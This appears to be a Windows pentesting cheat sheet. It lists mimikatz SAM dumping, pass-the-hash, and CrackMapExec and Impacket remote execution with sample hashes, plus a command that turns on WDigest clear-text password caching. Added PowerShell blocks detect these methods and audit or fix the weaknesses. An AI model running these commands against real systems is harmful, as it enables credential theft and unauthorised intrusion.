Mimikatz

Dump the SAM.

privilege::debug
token::elevate
lsadump::sam

Pass the hash

pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
whoami /priv

CrackMapExec

WMIexec

crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "cmd /c whoami" 192.168.204.183

ATexec

crackmapexec smb --exec-method atexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method atexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

SMBexec

crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method smbexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

MMCexec

crackmapexec smb --exec-method mmcexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec smb --exec-method mmcexec -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

WINrm

crackmapexec winrm -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183
crackmapexec winrm -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "whoami" 192.168.204.183

Impacket

PSexec

/opt/impacket/examples/psexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

DCOMexec

/opt/impacket/examples/dcomexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

SMBexec

/opt/impacket/examples/smbexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

WMIexec

/opt/impacket/examples/wmiexec.py "./Administrator:pass123"@192.168.204.183
/opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183

ATexec

/opt/impacket/examples/atexec.py "./Administrator:pass123"@192.168.204.183 "whoami"
/opt/impacket/examples/atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.204.183 "whoami"
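All of the CrackMapExec and Impacket execution methods above leave a characteristic trace on the target host: service installation for psexec/smbexec, a scheduled task for atexec, a cmd.exe child of WmiPrvSE.exe, mmc.exe or dllhost.exe for wmiexec/dcomexec/mmcexec, and an NTLM network logon for a local account for the "-d ." pass-the-hash cases. The following PowerShell is an added example, not part of the original notes: a function that flags those patterns in a set of event-like objects. The property names (Id, Host, ImagePath, TaskName, ParentProcess, NewProcess, LogonType, AuthPackage, TargetDomain) are an assumed flattening of Get-WinEvent records, and the sample events are constructed for this example, not real telemetry.

```powershell
# Added example (not part of the original notes): flag host-side events that are
# typical of the remote-execution methods listed above. The input objects imitate
# flattened Get-WinEvent records (assumed property names); the sample events at
# the bottom are constructed for this example.

function Find-RemoteExecIndicators {
    param([Parameter(Mandatory)] [object[]] $Events)

    foreach ($e in $Events) {
        switch ($e.Id) {
            # System 7045 (service installed): psexec-style tools register a service
            # whose binary was just written to ADMIN$ (%SystemRoot%); smbexec-style
            # ones point the service at cmd.exe redirecting output to \\127.0.0.1\C$.
            7045 {
                if ($e.ImagePath -match '^(%SystemRoot%|C:\\Windows)\\[A-Za-z]{4,12}\.exe$' -or
                    $e.ImagePath -match '\\\\127\.0\.0\.1\\(C|ADMIN)\$') {
                    [pscustomobject]@{
                        Time    = $e.Time
                        Host    = $e.Host
                        Pattern = 'service-based remote exec (psexec/smbexec-like)'
                        Detail  = $e.ImagePath
                    }
                }
            }
            # Security 4698 (scheduled task created): atexec creates a task, runs it
            # once, collects the output and deletes it again. Review every new task
            # whose name looks random or that was created over the network.
            4698 {
                [pscustomobject]@{
                    Time    = $e.Time
                    Host    = $e.Host
                    Pattern = 'scheduled-task remote exec (atexec-like)'
                    Detail  = "$($e.TaskName) created by $($e.Account)"
                }
            }
            # Security 4688 (process created): wmiexec launches cmd.exe under
            # WmiPrvSE.exe; dcomexec/mmcexec launch it under mmc.exe or dllhost.exe.
            4688 {
                if ($e.ParentProcess -match '\\(WmiPrvSE|mmc|dllhost)\.exe$' -and
                    $e.NewProcess -match '\\(cmd|powershell)\.exe$') {
                    [pscustomobject]@{
                        Time    = $e.Time
                        Host    = $e.Host
                        Pattern = 'WMI/DCOM remote exec (wmiexec/dcomexec/mmcexec-like)'
                        Detail  = "$($e.ParentProcess) -> $($e.NewProcess)"
                    }
                }
            }
            # Security 4624 logon type 3 over NTLM for a LOCAL account (target domain
            # equals the host name): the shape of the "-d ." pass-the-hash logons above.
            # On domain-joined hosts local accounts should not be used remotely at all.
            4624 {
                if ($e.LogonType -eq 3 -and $e.AuthPackage -eq 'NTLM' -and
                    $e.TargetDomain -eq $e.Host) {
                    [pscustomobject]@{
                        Time    = $e.Time
                        Host    = $e.Host
                        Pattern = 'NTLM network logon with local account (pass-the-hash shape)'
                        Detail  = "$($e.TargetDomain)\$($e.Account)"
                    }
                }
            }
        }
    }
}

# Constructed sample events (not real telemetry); four of the six should be flagged.
$sampleEvents = @(
    [pscustomobject]@{ Id = 7045; Time = '2024-05-01T10:00:01'; Host = 'WS01'; ImagePath = '%SystemRoot%\bHqTzXpW.exe' }
    [pscustomobject]@{ Id = 7045; Time = '2024-05-01T10:02:10'; Host = 'WS01'; ImagePath = 'C:\Windows\System32\svchost.exe -k netsvcs' }
    [pscustomobject]@{ Id = 4688; Time = '2024-05-01T10:05:00'; Host = 'WS01'; ParentProcess = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; NewProcess = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Id = 4698; Time = '2024-05-01T10:06:00'; Host = 'WS01'; TaskName = '\AbCdEfGh'; Account = 'Administrator' }
    [pscustomobject]@{ Id = 4624; Time = '2024-05-01T10:07:00'; Host = 'WS01'; LogonType = 3; AuthPackage = 'NTLM'; TargetDomain = 'WS01'; Account = 'Administrator' }
    [pscustomobject]@{ Id = 4624; Time = '2024-05-01T10:08:00'; Host = 'WS01'; LogonType = 2; AuthPackage = 'Kerberos'; TargetDomain = 'CORP'; Account = 'alice' }
)

Find-RemoteExecIndicators -Events $sampleEvents | Format-Table -AutoSize
```

To run it against live data, map the fields of Get-WinEvent output (or your SIEM export) onto the assumed property names; the 4624 rule is deliberately narrow (local account plus NTLM plus network logon) so that ordinary domain logons are not reported.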

Search for auto-logon credentials.

gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | select "Default*"

Check whether AlwaysInstallElevated is enabled (it must be 1 in both HKCU and HKLM).

gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated
gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated

Look for unquoted service paths.

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Check LSASS WDigest caching.

(gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential

(If it is set to 1, clear-text passwords are kept in LSASS and mimikatz can read them.)

The value can be changed with the command below (1 enables caching, 0 disables it); a reboot is required for the change to take effect:

sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1
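The four local checks above (auto-logon credentials, AlwaysInstallElevated, unquoted service paths, WDigest caching) are easier to run and hand over as one report. The PowerShell below is an added example, not part of the original notes: a read-only audit function that applies the same registry and WMI checks, returns one object per finding with the matching fix, and a second function that applies the WDigest mitigation (UseLogonCredential = 0). It assumes it is run from an elevated session on the host under review; the remediation text is the reviewer's advice, not output of any tool.

```powershell
# Added example (not part of the original notes): the four local checks above
# gathered into one read-only report, plus the mitigation for the WDigest finding.
# Run from an elevated PowerShell session on the host being reviewed.

function Get-LocalPrivEscFindings {
    $findings = @()

    # 1. Auto-logon: Winlogon\DefaultPassword stores the password in clear text.
    $wl = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    if ($wl.DefaultPassword) {
        $findings += [pscustomobject]@{
            Check  = 'AutoLogon clear-text password'
            Detail = "DefaultUserName=$($wl.DefaultUserName)"
            Fix    = 'Remove DefaultPassword and set AutoAdminLogon to 0'
        }
    }

    # 2. AlwaysInstallElevated only matters when it is 1 in BOTH HKLM and HKCU.
    $aiLM = (Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\Installer' `
                 -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $aiCU = (Get-ItemProperty 'HKCU:\Software\Policies\Microsoft\Windows\Installer' `
                 -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    if ($aiLM -eq 1 -and $aiCU -eq 1) {
        $findings += [pscustomobject]@{
            Check  = 'AlwaysInstallElevated'
            Detail = 'Enabled in HKLM and HKCU: any user can install an MSI as SYSTEM'
            Fix    = 'Set both values to 0 or remove the policy'
        }
    }

    # 3. Auto-start services whose unquoted executable path contains a space
    #    (the same filter as the one-liner above, plus the space requirement).
    $services = Get-CimInstance Win32_Service | Where-Object {
        $_.StartMode -eq 'Auto' -and $_.PathName -and
        $_.PathName -notlike '"*' -and $_.PathName -notlike 'C:\Windows*' -and
        (($_.PathName -replace '\.exe.*$', '') -match ' ')
    }
    foreach ($svc in $services) {
        $findings += [pscustomobject]@{
            Check  = 'Unquoted service path'
            Detail = "$($svc.Name): $($svc.PathName)"
            Fix    = 'Quote ImagePath under HKLM:\SYSTEM\CurrentControlSet\Services\<name> and verify the directory ACLs'
        }
    }

    # 4. WDigest: UseLogonCredential = 1 keeps clear-text passwords in LSASS.
    #    On Windows 8.1 / Server 2012 R2 and later a missing value means it is off.
    $wd = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' `
               -ErrorAction SilentlyContinue).UseLogonCredential
    if ($wd -eq 1) {
        $findings += [pscustomobject]@{
            Check  = 'WDigest credential caching'
            Detail = 'UseLogonCredential=1'
            Fix    = 'Run Disable-WDigestCaching and reboot'
        }
    }

    return $findings
}

function Disable-WDigestCaching {
    # Mitigation for finding 4; the change only takes effect after a reboot.
    Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' `
        -Name UseLogonCredential -Value 0 -Type DWord
}

Get-LocalPrivEscFindings | Format-List
```

An empty result means none of the four conditions is present; the unquoted-path rule deliberately excludes paths without a space, because those cannot be hijacked by the classic search-order trick.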

Credentials in SYSVOL and Group Policy Preferences.

Push-Location \\example.com\sysvol
gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm1,*.psd1 -Recurse -EA SilentlyContinue | select-string password
Pop-Location
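The string search above also catches the specific case that matters most in SYSVOL: Group Policy Preference XML files carrying a cpassword attribute (the field GPP used to store AES-encrypted passwords with a published key, MS14-025). The PowerShell below is an added example, not part of the original notes: a scanner that parses the XML instead of grepping, reports which preference item and account each stored password belongs to, and a helper that builds a constructed sample tree so it can be tried offline. The cpassword value and the GUID in the sample are placeholders, not real data, and the function does not decrypt anything; the aim is to find and remove the items.

```powershell
# Added example (not part of the original notes): report Group Policy Preference
# XML files under a SYSVOL path that still carry a cpassword attribute. The
# sample tree built by New-GppSampleTree is constructed for this example.

function Find-GppCredentials {
    param([Parameter(Mandatory)] [string] $SysvolPath)   # e.g. \\example.com\sysvol or a local copy

    Get-ChildItem -Path $SysvolPath -Recurse -Include *.xml -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop }
            catch { return }              # skip unreadable or malformed files
            if (-not $doc) { return }     # empty file

            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                # Groups/Drives/Services items name the account in userName,
                # ScheduledTasks items in runAs.
                $account = if ($node.HasAttribute('userName')) { $node.GetAttribute('userName') }
                           elseif ($node.HasAttribute('runAs')) { $node.GetAttribute('runAs') }
                           else { '' }
                [pscustomobject]@{
                    File     = $file.FullName
                    Item     = $node.ParentNode.Name   # e.g. User, Group, Drive, Task
                    Account  = $account
                    Modified = $file.LastWriteTime
                    Fix      = 'Delete the preference item, rotate the account, re-create it without a stored password'
                }
            }
        }
}

function New-GppSampleTree {
    # Constructed stand-in for \\example.com\sysvol; placeholder content only.
    $root = Join-Path ([IO.Path]::GetTempPath()) 'gpp-sample'
    $dir  = Join-Path $root 'example.com\Policies\{PLACEHOLDER-GUID}\Machine\Preferences\Groups'
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    $xml = @'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{PLACEHOLDER-CLSID}">
  <User clsid="{PLACEHOLDER-CLSID}" name="localadmin">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="PLACEHOLDER_NOT_A_REAL_VALUE" changeLogon="0" noChange="1"
      neverExpires="1" acctDisabled="0" userName="localadmin"/>
  </User>
</Groups>
'@
    Set-Content -LiteralPath (Join-Path $dir 'Groups.xml') -Value $xml -Encoding UTF8
    return $root
}

# Offline try-out on the constructed tree; one finding for item "User", account "localadmin".
$sysvol = New-GppSampleTree
Find-GppCredentials -SysvolPath $sysvol | Format-List

# Against a real domain (run as a user with read access to SYSVOL):
# Find-GppCredentials -SysvolPath \\example.com\sysvol | Export-Csv gpp-findings.csv -NoTypeInformation
```

Parsing the XML rather than searching for the word "password" avoids false positives from comments and documentation, and the Modified timestamp shows how long a stored password has been sitting in the share.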